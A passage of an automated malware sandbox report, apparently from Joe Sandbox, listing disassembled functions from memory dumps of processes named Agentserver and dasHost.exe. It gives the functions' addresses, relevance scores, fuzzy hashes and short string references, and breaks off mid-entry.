Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49e0a9864b88cae3dcac3d40f794b64fef9dcb5a547f2cc1336f84d5c963bd3
Instruction ID: 4b1b2424575410643abf7e0cf157309cfc9751bdd8291e071be40e82b80a9942
Opcode Fuzzy Hash: d49e0a9864b88cae3dcac3d40f794b64fef9dcb5a547f2cc1336f84d5c963bd3
Instruction Fuzzy Hash: 7301463091890E9EEB59EB2484492BD72A0FF18345F9008BEE40AC6192DF3AA150C654

Function 00007FF848E80610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fd3b44786fe7282e00652634c3f0765d690a8b92e471c88895833a130c659e6
Instruction ID: e0552c9f6c50e61e8ec394cf9316680ab40d601585b6297533c918fe62d67460
Opcode Fuzzy Hash: 0fd3b44786fe7282e00652634c3f0765d690a8b92e471c88895833a130c659e6
Instruction Fuzzy Hash: 9301463091990E9EEF48FB6484492BD73A0FF19345F9008BEE80EC3192DF39A550C604

Function 00007FF848E81140 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7adbc48dc8112109f46c03732521451f84f347ee79ee15734605af87360c8dbb
Instruction ID: 5763f0366f55f5fd9493259fbd725f9922fb353b45f3ea94d91c333795e172a5
Opcode Fuzzy Hash: 7adbc48dc8112109f46c03732521451f84f347ee79ee15734605af87360c8dbb
Instruction Fuzzy Hash: 23F0AF70D1DA1E8EFB98AB6898583FE77E0FF56291F4006BAD41AC31C1DF3511148644

Function 00007FF848E8ACA8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1db850970048b9ab15f374abc6a7483d4595631cccbc0857e6ccc16ac531aa7a
Instruction ID: 2f8f8965ccd38f9af4d646cbaecdf24ee07bf15ae4244b0ac5168a65c0647a37
Opcode Fuzzy Hash: 1db850970048b9ab15f374abc6a7483d4595631cccbc0857e6ccc16ac531aa7a
Instruction Fuzzy Hash: 68F09036A4D5166FD211F65CE8D14FE33A1FF803A5B488A73D04C87053EE29A04886A9

Function 00007FF848E8ACF8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 485991ed85f3c56cb4264a29e1f77b8707091a5c10d227cec68f92280d08b2d6
Instruction ID: 60623c5ddb0487337da489babecc9d36fb5bcd49d3903dfe3c66a68774220260
Opcode Fuzzy Hash: 485991ed85f3c56cb4264a29e1f77b8707091a5c10d227cec68f92280d08b2d6
Instruction Fuzzy Hash: 4CF08C3091950E9EEF58FB64C4496FE76A0FF08348F1008BAE42ED2182DF75A550C644

Function 00007FF848E805D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69aa67b44bf70016563448c90acd6794b93301251c11c5741602f11a134d8db
Instruction ID: 2f8568492eb1f421a3b4d8aeb36844c8caa2997e309b66eabb13dffe684fc162
Opcode Fuzzy Hash: c69aa67b44bf70016563448c90acd6794b93301251c11c5741602f11a134d8db
Instruction Fuzzy Hash: 18F06D7091DA4E9FEB88EE64D4152FE77A4FF15385F94447AE80DC3181CB36A560CB88

Function 00007FF848E827C9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db7c81f48aceed244c1b117304804e34155907db9ac44bb2b9d1c2958eb7df40
Instruction ID: 076d9d5bb644687fe4dc44d9558a9759a20e53864ed937762154909c06d13829
Opcode Fuzzy Hash: db7c81f48aceed244c1b117304804e34155907db9ac44bb2b9d1c2958eb7df40
Instruction Fuzzy Hash: 3EF04F3180E7898FEB5AAF2488191A93BB0FF06241F4504BAD409CA1D3DB399854C751

Function 00007FF848E8283D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7daad1123a279640263d5adc492f58396609038a74f05b361d65fc851c8c4ec7
Instruction ID: 6f78387e14c629a7216eff43a3108ff62f3854e30201b044a6af3ce936d39039
Opcode Fuzzy Hash: 7daad1123a279640263d5adc492f58396609038a74f05b361d65fc851c8c4ec7
Instruction Fuzzy Hash: B4F0903091E6898FEF59AF2484192AD3BA0FF16341F8504BED809C60D2DB389450C701

Function 00007FF848E91AE1 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a035a4687ecad3a9bc84a92d14fad2e07116126750b393166f02871e02cdf2
Instruction ID: f2cb264bb7aa0d4aaea12fad3dbe5456073ca421242392292357ffc13d6cccc1
Opcode Fuzzy Hash: c8a035a4687ecad3a9bc84a92d14fad2e07116126750b393166f02871e02cdf2
Instruction Fuzzy Hash: 37F03430D093098FEB15EF94C9507EDB3F1FB10355F140226C0099B294DBB9AA84CB48

Function 00007FF848E92C7D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e741582a7e144336ed1da6a0e241258ab2599c5c742dda1a41fa0b4443f3fc0a
Instruction ID: 5f8ac2105bd96f9dc2f8fd909b468253d56112f42ac45e1147db6b089e008f34
Opcode Fuzzy Hash: e741582a7e144336ed1da6a0e241258ab2599c5c742dda1a41fa0b4443f3fc0a
Instruction Fuzzy Hash: ABF0F831D0860A8FEB94FB94C485AECB3F1FB59344F60017AC00AE7292CF786944CB44

Function 00007FF848E91649 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21d5768a268721ffa60d97ab409e0b3bb5310d3fb029bbac3534de2f02b8c5fb
Instruction ID: 1e170c28c28058338071c33042294b9ff04668b03fc8c8c32eb36acac0e0d758
Opcode Fuzzy Hash: 21d5768a268721ffa60d97ab409e0b3bb5310d3fb029bbac3534de2f02b8c5fb
Instruction Fuzzy Hash: C5E09A30A0930DCFEB14EF94C9506ED73F1FB64311F140226C009DB294EBB8AA40CB84

Function 00007FF848E95500 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce97bc98ee211a05739e324d6686f32a32f297873dca0a171734cda5a43d3c0
Instruction ID: d0384854fae4acce8a192b5f27e196853bd5c5701c9d402aacba9e8d4b3d7f57
Opcode Fuzzy Hash: 7ce97bc98ee211a05739e324d6686f32a32f297873dca0a171734cda5a43d3c0
Instruction Fuzzy Hash: 14C01272D18E298FAB88EE58988C3B8BBE2FB58644F40042AC108C3140EF3088116710

Non-executed Functions

Function 00007FF848E8E80A Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

Z, xrefs: 00007FF848E8E818
., xrefs: 00007FF848E8E8CC
-, xrefs: 00007FF848E8E863
6, xrefs: 00007FF848E8E8A6
N, xrefs: 00007FF848E8E906

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID: -$.$6$N$Z
API String ID: 0-3931608286
Opcode ID: 6db181fc1803313b9f17614ca9477df61c2c149bad363d7c2d7453ab4dc24a9d
Instruction ID: 1e6d7395e35dccf9d04e435fe3b1f9072a808e5aa8d665217cc33e38cd5a0701
Opcode Fuzzy Hash: 6db181fc1803313b9f17614ca9477df61c2c149bad363d7c2d7453ab4dc24a9d
Instruction Fuzzy Hash: BE319270D0862A8FEBA4EB18C888BAEB7F1BB55345F4041E9D41DE7255DB34AA80CF45

Function 00007FF848E8F6C5 Relevance: 5.1, Strings: 4, Instructions: 65COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF848E8F731
[, xrefs: 00007FF848E8F766
B, xrefs: 00007FF848E8F76F
], xrefs: 00007FF848E8F6FC

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID: B$M$[$]
API String ID: 0-3643626785
Opcode ID: c19652dad4910be1230ecceab07fa445a0969f8fea00c8a9b474db7a5fb34cbb
Instruction ID: cfef3c755576d34c6e5e265a369165edb7557ac7bae7d1460669262b5c5a796d
Opcode Fuzzy Hash: c19652dad4910be1230ecceab07fa445a0969f8fea00c8a9b474db7a5fb34cbb
Instruction Fuzzy Hash: 4E31F470D1962A8FEB68EF14C8907EEB7B1FB55341F4080A9D40D97281CB386AC4CF84

Function 00007FF848E8E951 Relevance: 5.1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

Strings

;, xrefs: 00007FF848E903F8
k, xrefs: 00007FF848E8E74E
^, xrefs: 00007FF848E9044C
{, xrefs: 00007FF848E8E965

Memory Dump Source

Source File: 00000005.00000002.2130250565.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e80000_Agentserver.jbxd

Similarity

API ID:
String ID: ;$^$k${
API String ID: 0-1912294886
Opcode ID: eae880921b9feb4367902a04a9c84ec7fced3aecc3e28f83fe0ab91b6684a82f
Instruction ID: ceae02c970b0b020085edbd476a9643f4ea1a4dcbb0fd90c286cf661c4246058
Opcode Fuzzy Hash: eae880921b9feb4367902a04a9c84ec7fced3aecc3e28f83fe0ab91b6684a82f
Instruction Fuzzy Hash: 1721E370D0866A8FEBA4EF18C8847AEB6B1BF56341F4041F9944D93281DB785AC4CF45

Analysis Process: dasHost.exePID: 5740, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848E7F0A6 Relevance: 8.9, Strings: 7, Instructions: 153COMMON

Download Yara Rule

Strings

!, xrefs: 00007FF848E7ED2D
Y, xrefs: 00007FF848E7F949
\, xrefs: 00007FF848E7F0BB
i, xrefs: 00007FF848E7F6B6
1, xrefs: 00007FF848E7FB1A
8, xrefs: 00007FF848E7F633
_, xrefs: 00007FF848E7F0C8

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: !$1$8$Y$\$_$i
API String ID: 0-1737076053
Opcode ID: 213411c67b38e960839735285eec36f491c99f11da7c89a133537c26276610d9
Instruction ID: 066575fe9374c6adf78532510997bef3adbe28af21c872fc6844a06d53afc101
Opcode Fuzzy Hash: 213411c67b38e960839735285eec36f491c99f11da7c89a133537c26276610d9
Instruction Fuzzy Hash: 1671C370D0866ACFEBA8EF14D8987ADB7B1BF54345F1041EAD40EA7291CB385A84CF14

Function 00007FF848E7E91B Relevance: 5.1, Strings: 4, Instructions: 123COMMON

Download Yara Rule

Strings

", xrefs: 00007FF848E7FEF2
{, xrefs: 00007FF848E7E92F
j, xrefs: 00007FF848E7ED60
J, xrefs: 00007FF848E7EA47

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: "$J$j${
API String ID: 0-387960718
Opcode ID: 52116aa1736c0ad96b686e770e0fc4da2eebe7e29c4b57e1c6265e74a7aee88e
Instruction ID: bd98ccf5a9297f4a2505585bf390b2307867caad0d124d2fb1e36a0ee84016da
Opcode Fuzzy Hash: 52116aa1736c0ad96b686e770e0fc4da2eebe7e29c4b57e1c6265e74a7aee88e
Instruction Fuzzy Hash: 5451B370D0966A8FEBA8EF14D8947EDB7B1BF59345F0001FAD44DA6281CB386A84CF45

Function 00007FF848E7EDB1 Relevance: 3.8, Strings: 3, Instructions: 82COMMON

Download Yara Rule

Strings

i, xrefs: 00007FF848E7F6B6
$, xrefs: 00007FF848E7EDBB
8, xrefs: 00007FF848E7F633

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: $$8$i
API String ID: 0-852347586
Opcode ID: 41a4ad9cb5fa36c7e1583a0dfebd3b9fc05d047e19755708051e6dea9b0b436b
Instruction ID: 23ba32fcba59221d53c0f6630edac8e6edc864a564f582c4b5ab0dd7401a80b1
Opcode Fuzzy Hash: 41a4ad9cb5fa36c7e1583a0dfebd3b9fc05d047e19755708051e6dea9b0b436b
Instruction Fuzzy Hash: 8B31C274D0866A8FEB68EF14D8947ADB7B1BF54345F1041EAD40DA2291CF346E85CF44

Function 00007FF848E7C93D Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

{{M, xrefs: 00007FF848E7C93F

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: {{M
API String ID: 0-3076332503
Opcode ID: ba1bbf6916914e1c12806460adab84e0f6c2282d5bce06bc95cd575c596587d3
Instruction ID: ace4aabfe10e8b7767ab10d6b0c44083470052c05dd0db42adae5477edc82650
Opcode Fuzzy Hash: ba1bbf6916914e1c12806460adab84e0f6c2282d5bce06bc95cd575c596587d3
Instruction Fuzzy Hash: 6C810663A8D92A6EE319B67DF8050F97754FF413B5F084677D24CC9083DF28708586A8

Function 00007FF848E800CD Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

'X_H, xrefs: 00007FF848E7FCCF

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: 'X_H
API String ID: 0-992657322
Opcode ID: a5c3dc73455029a6aff57f63455d8f3f7811efcb62808070477c171d0e8e332d
Instruction ID: 00e47ebf9e0f2f10dbe6fd54efe8571ac6662e7890180f262bba20177e4c8f1c
Opcode Fuzzy Hash: a5c3dc73455029a6aff57f63455d8f3f7811efcb62808070477c171d0e8e332d
Instruction Fuzzy Hash: 7F3104B0D08A5A8FEBA8EB1888557E9B7A1FB14341F0041BAC50DA3281CF346A80CF19

Function 00007FF848E7FC9E Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

'X_H, xrefs: 00007FF848E7FCCF

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: 'X_H
API String ID: 0-992657322
Opcode ID: 1b8aab26b475fd4c702de8352641014655c22fc61f68ca3d0f9e1f7be2f966ec
Instruction ID: 1a9dbc4456aae918a7a2602285060664e8839ee42d2ee03baa2883cdda5dd544
Opcode Fuzzy Hash: 1b8aab26b475fd4c702de8352641014655c22fc61f68ca3d0f9e1f7be2f966ec
Instruction Fuzzy Hash: 5D21F9B1D18A599FDBA8EF2888557A8B7E1FF54341F5040FAC50DE3282DE346A818F19

Function 00007FF848E7EE64 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

9, xrefs: 00007FF848E7EEC0

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: 1075a60e5866daf0084c8fb0e14e461242717227edc69e0adef904ee02dbf04c
Instruction ID: d47aaeeba38837f281efb74ce2925e9264a03c23fd6e51190877db161551821f
Opcode Fuzzy Hash: 1075a60e5866daf0084c8fb0e14e461242717227edc69e0adef904ee02dbf04c
Instruction Fuzzy Hash: 9A11A771E0896A8FEBA4EE18DC487E9B7F1FB94342F4001A6D40DE3291DB349A859F44

Function 00007FF848E834D8 Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc54e1c4d8711aab977e5ffa9e1810ce40d0898088b6255f67d759676723a0f4
Instruction ID: 9d04a6630488bd82d3a9e59a9aeb93bbf175eb46eae06dd9ff0be1f372c54978
Opcode Fuzzy Hash: fc54e1c4d8711aab977e5ffa9e1810ce40d0898088b6255f67d759676723a0f4
Instruction Fuzzy Hash: 18218C21D0E6CA9FE756E73888591A97FB0FF16740F4904FBC088CB0A3DA28A548C352

Function 00007FF848E7DA99 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f068801bde85222637159ba5f7ae8268c176229bae766ced15bff761b6444ca0
Instruction ID: 6cd067c1f87d42b000ccf9ede03a97dbf997dc20f3060eb63ee7a76b6e35e45f
Opcode Fuzzy Hash: f068801bde85222637159ba5f7ae8268c176229bae766ced15bff761b6444ca0
Instruction Fuzzy Hash: D7E14D30E1995ADFEB98EB68C4557B8B7B1FF58340F0441BAD00DE7296CB38A880CB55

Function 00007FF848E71698 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf38d7a5afbc4b0b01a18b2327359cccbe8cba7ca9d1e8828254b69b3d04eef0
Instruction ID: 3a96cc3156206b0d04ee6934a5f6c87ef66405facdb905489abf451007aee2da
Opcode Fuzzy Hash: bf38d7a5afbc4b0b01a18b2327359cccbe8cba7ca9d1e8828254b69b3d04eef0
Instruction Fuzzy Hash: 7581BE31A0CB8A8FDB98EE1C88555B977E2FF99741F14417AE44DC3286CF35AC028785

Function 00007FF848E82AA1 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 106abfea95146f341d27ded18ff13790074f77f39d0af63fe96f85f081eb3a82
Instruction ID: 86a9e8f526e82879bf94abd1606cc684d3d9f32167496ef221a3892bbb6a9fd0
Opcode Fuzzy Hash: 106abfea95146f341d27ded18ff13790074f77f39d0af63fe96f85f081eb3a82
Instruction Fuzzy Hash: F891A170D18A1D9EEBA4EBA8C8957BDB7B1FF58340F5041AAD40DE3292DF3469848B44

Function 00007FF848E706C0 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a102f48566fc8794a1d93b8eea7a28c477ee9be5375f38d96b50ca530dff5d9e
Instruction ID: ee77ca81e67ecfd79b580c6b9596c45a4d961ba2b6281ff8456c223bf375c300
Opcode Fuzzy Hash: a102f48566fc8794a1d93b8eea7a28c477ee9be5375f38d96b50ca530dff5d9e
Instruction Fuzzy Hash: 49613852D4E9C64FF215B6BC68191B96BD0FF527A0F0941F7D048D70DBEE3898068389

Function 00007FF848E7C9BD Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a79adae80bd36757de966f2e7078e9e9108ff90a2d21bfacc28e60754238daa
Instruction ID: f251b8b302a8ce8d94ad33fb7c547117631538ee6646250f9960d23911407762
Opcode Fuzzy Hash: 0a79adae80bd36757de966f2e7078e9e9108ff90a2d21bfacc28e60754238daa
Instruction Fuzzy Hash: CE51E3A7A8D92A5EE709BA7DF8010F87754FF413B2F084677D209C9083DF28708586A8

Function 00007FF848E83D35 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 729b4d6ba47972c733ffafe792b18396b24fc268fcfd2f6ccd69eccaa4589a8d
Instruction ID: c8e1a0941b3d0e6feff43f83e1ec432ed2874e56651adb257270eca225392860
Opcode Fuzzy Hash: 729b4d6ba47972c733ffafe792b18396b24fc268fcfd2f6ccd69eccaa4589a8d
Instruction Fuzzy Hash: 0D91C570D08A1D9EEB94EB68C8957EDB7B1FF58341F5051AAD00DE3292DB3869848B05

Function 00007FF848E7C279 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32a27eda772b1b30697e21134c77e80a9bb5ee7b9e71e09ae03f4fba2cff72a1
Instruction ID: 3d31385986affbd35409c8e6bb608d9437ce09fd7d3e7e34f89f6162ea1fd041
Opcode Fuzzy Hash: 32a27eda772b1b30697e21134c77e80a9bb5ee7b9e71e09ae03f4fba2cff72a1
Instruction Fuzzy Hash: 4A610470E0CA5D8FEB94EBA8D8556ADB7F5FF59340F4001BAD00DE7292DB3868819B44

Function 00007FF848E71D2D Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5039afa8af34130ece0d1997a91083a23432477597ea1462f6c847674ce80430
Instruction ID: 3ec0eebe7466dd536bdcab2cd1e6319b358616d552e09d7a3e6b5d8c69038ea2
Opcode Fuzzy Hash: 5039afa8af34130ece0d1997a91083a23432477597ea1462f6c847674ce80430
Instruction Fuzzy Hash: 4451C231A1CB8A8FDB48EE1888545BA77E2FF98341F14457ED44AC7285CF35E802CB85

Function 00007FF848E83BFA Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d57404d5f94a5e947b755845efd50997da709a97c71875abba7c686695ae3d3
Instruction ID: 676480e6bad61eca49978aed8aa2b4fa1582aaa85708fee4092c882c59323313
Opcode Fuzzy Hash: 5d57404d5f94a5e947b755845efd50997da709a97c71875abba7c686695ae3d3
Instruction Fuzzy Hash: 1B412326B0E999AEE705BB2CE8591FE7BA0FF423B2F4406B7D048C7052DA245048C765

Function 00007FF848E73271 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6038d891e741e7af063044f2e9105b59f8d9c2652e09a3582ba7b45ae2a21391
Instruction ID: 25da75e1e9fbd34d9e5446088ee11a258e26bd98bf50a48258f4fe52f10d72da
Opcode Fuzzy Hash: 6038d891e741e7af063044f2e9105b59f8d9c2652e09a3582ba7b45ae2a21391
Instruction Fuzzy Hash: 0B512770D0C61D9FEB94EBA8D4546EDB7B1FF58350F90007AD00AE7292DB38A844CB15

Function 00007FF848E72145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 803c60ed4d29fb49409f7549f65672233aa3d82aa4667cc1561bb417a3149894
Instruction ID: 2b4e1b42281cfa3d98ece77c41f151858c00dd7a961c052c26b7e7037cb6a92f
Opcode Fuzzy Hash: 803c60ed4d29fb49409f7549f65672233aa3d82aa4667cc1561bb417a3149894
Instruction Fuzzy Hash: 39412131E1DA8A4FE355EB3898591B9BBE0FF4A390F0941FAD00EC7193DF28A8418355

Function 00007FF848E7363B Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2226956527.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848e70000_dasHost.jbxd

Similarity

API ID:
String ID:
API String ID:
